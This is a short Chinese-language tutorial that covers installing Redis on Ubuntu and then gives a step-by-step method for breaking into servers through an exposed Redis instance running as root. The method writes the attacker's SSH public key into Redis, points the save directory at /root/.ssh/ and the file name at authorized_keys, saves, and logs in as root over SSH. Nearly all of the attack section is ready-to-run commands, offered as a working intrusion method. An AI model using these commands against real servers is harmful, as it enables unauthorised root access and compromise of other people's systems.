在ubuntu上安装是非常方便的,两个命令就行了。
$sudo apt-get update
$sudo apt-get install redis-server
若是redis-cli命令出现redis 127.0.0.1:6379>,则安装成功了
如何根据Redis和ssh入侵入侵服务器。原理上并不复杂,只是利用的规则有点苛刻:
1. redis要暴露在公网上
2. 嗯ssh进程也得开
3. Redis要是以root的权限启动的。(这个命令就是以root权限启动的(端口随便填):redis-server --port 6369)
先在本地建个ssh的秘钥
ssh-keygen -t rsa
cd ~/.ssh/
然后将公钥写入文本中(文本还可以有路径,比如说/tmp/1.txt)
前后空两行,公钥的内容就不会跟redis的内容混在一起了
(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n")>1.txt
然后把里面的内容设置到远程的redis服务器上,设置key为233
cat 1.txt | redis-cli -h xxx.xxx.x.xx -p 6379 -x set 233
远程连接一下
redis-cli -h xxx.xxx.x.xx
修改保存的路径
xxx.xxx.x.xx :6379> config set dir /root/.ssh/
xxx.xxx.x.xx :6379> config get dir
修改保存的名称
xxx.xxx.x.xx :6379> config set dbfilename "authorized_keys"
保存
xxx.xxx.x.xx :6379> save
SAVE 命令执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。
远程利用自己的私钥登录该服务器。
ssh -i id_rsa root@xxx.xxx.x.xx
